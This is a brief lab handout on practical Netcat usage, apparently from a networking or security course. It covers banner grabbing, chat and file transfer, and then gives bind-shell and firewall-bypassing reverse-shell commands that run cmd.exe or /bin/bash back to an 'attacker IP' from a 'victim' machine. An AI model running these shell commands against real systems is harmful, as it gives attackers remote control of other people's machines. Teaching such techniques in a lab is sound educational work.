## Network Lab 1
**The Following you will employ popular, practical examples of implementing Netcat.**

## Banner grabbing (HTTP):
```
nc -vn 10.1.1.100 80
```
After pressing the Enter key to execute the command, type anything, such as Hello SERVER. Then the server will send back the banner header.
## Simple chatting: Start typing the message that should be sent to the other party on any side:
Set up and listen on one side:
```
nc -v -lp 1234
```
On the other side, connect to the listener:
```
nc -v [Remote IP] 1234
```
## Transfer files:
Listen on one side:
```
nc -vn -lp 1234 > file.txt
```
Send the file from the other end:
```
nc -vn <other side remote IP> 1234 < file.txt
```
## Binding a shell:
Assuming that the victim is the Windows machine, start listening:
```
nc -lvp 1234 -e cmd.exe

```
Connect to the victim host from the attacker machine:
```
nc -vn [Victim IP] 1234

```
## Reverse shell to bypass the firewall:
Start listening to the attacker machine (i.e. Kali Linux):
```
nc -nlvp 1234

```
If the victim is using a Windows machine, enter the following:
```
nc -vn [Attacker IP] 1234 -e cmd.exe 
```
If the victim is using a Linux machine, then you should use -e /bin/bash.

